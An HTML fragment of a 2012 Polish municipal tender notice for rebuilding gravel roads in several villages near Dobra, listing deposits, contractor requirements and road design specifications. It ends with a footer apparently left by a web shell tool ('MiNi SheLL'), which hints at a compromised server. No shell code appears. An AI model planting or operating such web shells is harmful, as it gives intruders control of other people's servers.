obce.Zgodnie z planem sytuacyjnym z remontem odcinka  drogi gminnej w m. Skęczniew na części działki 155/3 na długości 131,0mb,  nie kolidują urządzenia obce. Oznakowanie. Projekt przewiduje wymianę istniejącego oznakowania pionowego. Projekt nie zawiera odrębnego opracowania projektu oznakowania Wszystkie roboty należy wykonać zgodnie z warunkami BHP, warunkami technicznego wykonania, obowiązującymi normami i współczesną wiedzą budowlaną. Roboty należy wykonać zgodnie z załączoną dokumentacją projektową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb	
3.000,00 zł
Przebudowa drogi gminnej w miejscowości Długa Wieś na odcinku 500,0 mb	
5.000,00 zł
Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 300,0 mb	
2.000,00 zł
Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 250,0 mb	
1.000,00 zł
Przebudowa drogi gminnej w miejscowości Skęczniew na części działki nr 155/3 na odcinku 131,0 mb	
1.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z załącznikiem do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunkiem udziału w postępowaniu o udzielenie przedmiotowego zamówienia publicznego jest wykazanie przez oferenta co najmniej jednej roboty budowlanej odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia zamówienia o wartości min. 500.000,00 złotych brutto i zakresie budowy dróg z nawierzchni asfaltowej odpowiadającej przedmiotowi niniejszego zamówienia publicznego, odpowiadającej przedmiotowi niniejszego zamówienia publicznego, którą oferent wykonywał w okresie ostatnich pięciu lat - należy dołączyć dokumenty (referencje) potwierdzające wykonanie w/w roboty budowlanej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunkiem udziału jest wykazanie osoby które posiadają następujące uprawnienia do kierowania robotami budowlanymi w następujących specjalnościach min 1 osoba z uprawnieniami wykonawczymi w branży drogowej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunkiem udziału w postępowaniu jest wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę min. 500.000,00 PLN (słownie: pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy.
Parafowany wzór umowy.
Parafowany opis przedmiotu zamówienia.
Spis oświadczeń lub dokumentów z numeracją stron</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>działania tzw. siły wyższej
z przyczyn zależnych od Zamawiającego
okoliczności, których nie można było przewidzieć,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dobra.nowoczesnagmina.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dobrej
Pl. Wojska Polskiego 10
62 - 730 Dobra 
pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 09:45, miejsce: Urząd Miejski w Dobrej
Pl. Wojska Polskiego 10
62 - 730 Dobra 
pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie ze środków Urzędu Marszałkowskiego Województwa Wielkopolskiego na zadania: Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb Przebudowa drogi gminnej w miejscowości Długa Wieś na odcinku 500,0 mb Przebudowa drogi gminnej w miejscowości Rzymsko na odcinku 300,0 mb.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dla inwestycji pn.:1.Przebudowa drogi gminnej w miejscowości Chrapczew na odcinku 500,0 mb; obejmuje wykonanie następujących robót budowlanych: Przedmiotem  niniejszego opracowania jest projekt techniczny na przebudowę drogi gminnej w miejscowości  Chrapczew. Długość projektowanego odcinka drogi wynosi 0.500 km. Zakres  robót  przewidziany niniejszym projektem obejmuje: roboty przygotowawcze w granicach projektowanego pasa  drogowego w tym roboty rozbiórkowe  oraz wycinka drzew i krzewów wykonanie robót  ziemnych w wykopie i nasypie przebudowę przepustu wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie ułożenie warstwy ścieralnej nawierzchni z betonu asfaltowego budowę zjazdów uzupełnienie poboczy wykonanie oznakowania pionowego. URZĄDZENIA OBCE W ciągu projektowanego przedsięwzięcia występuje liczne uzbrojenie podziemne i napowietrzne w tym sieć wodociągowa, linia energetyczna oraz telekomunikacyjna. Przebieg urządzeń podziemnych i napowietrznych  pokazują  mapy sytuacyjno-wysokościowe. Przy prowadzeniu robót należy dostosować się do  zaleceń  przedstawionych w Opinii Zespołu Uzgadniania Dokumentacji. Lokalizacja sieci telekomunikacyjnej koliduje z projektowaną przebudową drogi. Realizacja inwestycji możliwa jest po spełnieniu warunków podanych w uzgodnieniu załącznik  do  dokumentacji Telekomunikacji Polskiej  we Wrocławiu. Miejsca skrzyżowań z infrastrukturą telekomunikacyjną należy zabezpieczyć rurą ochronną dwudzielną grubościenną. Należy ustalić dokładnie lokalizację wodociągu i w jego obrębie oraz znaków geodezyjnych wszystkie roboty, a szczególnie ziemne prowadzić ręcznie, pod nadzorem i w porozumieniu z właścicielami tych urządzeń aby uniknąć uszkodzeń. STAN PROJEKTOWANY Parametry techniczne i dane wyjściowe kategoria drogi gminna klasa drogi D- dojazdowa prędkość projektowa Vp - 30 km/h kategoria ruchu KR 1 przekrój drogowy szerokość jezdni 4.00 m szerokość podbudowy 4.30 m szerokość korony 6.00 m szerokość poboczy 1.00 m spadek jezdni 2% obciążenie nawierzchni 80kN/oś warunki wodne przyjęto przeciętne warunki gruntowe przyjęto - grunty niewysadzinowe nośność podłoża przyjęto grupę G1 Rozwiązania sytuacyjne Usytuowanie drogi w istniejącym pasie komunikacyjnym przedstawiono na mapach sytuacyjno - wysokościowych w skali 1:1000. Projektowana droga posiada jeden łuk poziomy normatywny w km 0+234. Przebieg projektowanej drogi starano się dostosować do istniejącej drogi o nawierzchni gruntowej. Realizacja przedsięwzięcia nie wymaga zajęcia nieruchomości przyległych do drogi. Rozwiązania wysokościowe Rozwiązania wysokościowe planowanej inwestycji wykonano w oparciu o mapy sytuacyjno - wysokościowe do celów projektowych wykonane przez uprawnionego geodetę . W opracowaniu przyjęto następujące założenia: projektowana oś drogi winna być zbliżona do istniejącej osi drogi gruntowej zachowanie normatywnych pochyleń. Początek projektowanej drogi dowiązano wysokościowo do wysokości nawierzchni bitumicznej drogi gminnej w miejscowości Chrapczew. Wysokości na projektowanej jezdni wyznaczono w oparciu o: rzędne wysokościowe istniejących zjazdów gospodarczych rzędne wysokościowe przyległych terenów uzyskanie prawidłowych pochyleń dla odwodnienia nawierzchni Niweletę starano się zaprojektować w nawiązaniu do istniejącej niwelety uwzględniając wyrównanie nierówności w profilu podłużnym i wynosząc ją w  miarę  możliwości  o  projektowaną grubość konstrukcji  drogi. Przebieg  projektowanej  niwelety  drogi  przedstawia  rysunek - profil  podłużny. Odwodnienie Istniejąca  droga  gminna posiada  odwodnienie  powierzchniowe.  Od km  0+050 do km 0+280 po stronie lewej oraz od km 0+000 do km 0+090 po stronie  prawej drogi  znajduje  się rów, który jest zamulony i  w chwili  obecnej  nie spełnia prawidłowo swej  funkcji. Projektuje  się  odwodnienie  korpusu drogi za pomocą  spadków poprzecznych i podłużnych. Istniejące rowy wymagają  oczyszczenia. W  celu zapewnienia  prawidłowego  odwodnienia  pasa  drogowego w  km 0+074 zaprojektowano przebudowę  istniejącego  przepustu średnicy  60 cm  z  rur  WIPRO  o  długości  8.00 m.  Woda  zostanie  odprowadzona  do  istniejącego  cieku  naturalnego. Konstrukcja  nawierzchni Na  całej  długości  projektowanej  drogi  przyjęto  następującą  konstrukcję  jezdni  i  korony: kategoria  ruchu KR1 nośność  podłoża  G1 warunki  wodne  przeciętne Konstrukcja  nawierzchni  jezdni: 5 cm  warstwa  ścieralna  z  betonu  asfaltowego AC 11 S 50/70 dla KR1  wg  normy PN-EN 13108 z 2008 r. połączenie  międzywarstwowe  - skropienie nawierzchni kationową emulsją asfaltową 0.7 kg/m2 20 cm  podbudowa z kruszywa  łamanego melafir , bazalt wg normy PN-S-06102 z grudnia 1997 r. Przekrój  poprzeczny Na  projektowanej  drodze  przyjęto  następujący  przekrój: projektowana  szerokość  jezdni -4.00 m spadek   jezdni  dwustronny -2% pobocza   o  szerokości -1.00 m spadki  poboczy   o wartości - 6% Roboty  ziemne Przewiduje  się  wykonanie  koryta  pod w-wy  konstrukcyjne  jezdni  za  pomocą  równiarki. Urobek wbudowany  zostanie  gruntów  pobocze gruntów  ewentualny  nadmiar wywieziony  na  skazane  przez  inwestora  miejsce. Zagęszczenie   gruntów podłoża -  istniejące  podłoże  gruntowe  wyprofilować i  bezwzględnie  zagęścić   przy  użyciu  walca  wibracyjnego  celem  uzyskania  na  całej  powierzchni  wymaganego  wskaźnika  zagęszczenia  wg PN-S-02205 ,1998 dla głębokości  podłoża 0.0 - 0.5 wskaźnik 1.0  0.5 - 1.2 0.97 powyżej 1.2 0.95. Wszystkie  prowadzone  wykopy   należy  wykonywać  mechanicznie , jedynie  w  obrębie  urządzeń  obcych  -  ręcznie. Konstrukcja  poboczy Pobocza  należy  wykonać  z  gruntu  rodzimego pochodzącego  koryta drogi  oraz materiału dowiezionego umocnionego  pospółką , zagęszczonego  przy  pomocy  walca  ogumionego. Zjazdy W   ciągu  projektowanej  inwestycji  zaprojektowane  zostały  zjazdy  do  obsługi  przyległych  nieruchomości.  Dopuszcza  się  możliwość zmiany lokalizacji  zjazdów  do  poszczególnych nieruchomości  na  etapie  budowy. Zaprojektowano   5  szt  zjazdów z rurami   oraz  3 szt  bez  rur. Na  zjazdach projektuje  się  wykonanie  jezdni  o szerokości 4.00 m  oraz  poboczy  o szerokości  2x1.00 m. Przecięcie  krawędzi nawierzchni  zjazdu i drogi  wyokrąglić należy łukiem kołowym o promieniu 3.00 m Ścianki  czołowe zjazdów  wykonać  należy  z  darniny. Na  zjazdach  zaprojektowano   podbudowę  z kamienia  łamanego stabilizowanego mechanicznie  oraz  nawierzchnię żwirową.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com